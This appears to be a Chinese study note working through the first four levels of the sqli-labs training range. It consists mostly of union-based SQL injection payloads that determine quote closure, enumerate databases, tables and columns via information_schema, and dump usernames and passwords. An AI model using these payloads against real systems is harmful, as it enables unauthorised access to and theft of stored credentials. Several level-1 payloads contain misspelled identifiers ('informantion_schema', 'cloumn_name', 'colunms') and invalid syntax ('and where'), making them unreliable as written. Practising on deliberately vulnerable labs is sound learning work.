写在前面:从现在开始刷sqlilab靶场,温故而知新,练练sql语句也是极好的。
第一关:有回显?? 注入点就是id?? ’单引号闭合。
1、id=1' --+ 没报错。说明单引号闭合。
2、id=-1' union select 1,2,3 --+或者id=1’ order by 1,2,3...? 猜测回显表的列数。
3、id=-1' union select 1,2,group_concat(schema_name) from informantion_schema.schemata;查库
4、id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';查表
5、id=-1' union select 1,2,group_concat(cloumn_name) from information_schema.colunms where table_schema='security' and where table_name='users'; 查列
6、 id=-1' union select 1,2,group_concat(id,username,password) from security.users; 查记录
第二关:有回显,数字注入
1、id=1' 发现报错多了个',充分说明 id=1--+ 可行。
2、id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+;查库
3、id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ ; 查表
4、?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+;查列
5、?id=-1 union select 1,2,group_concat(id,username,password) from security.users --+查记录
第三关:?id=-1') union select 1,2,3 --+?
后面就是取数据了。
第四关:?id=1") union select 1,2,3 --+
后面就是取数据了。
总结:前四关就是找到注入点,通过回显判断闭合方式,再用union selecet 即可拿到库里数据。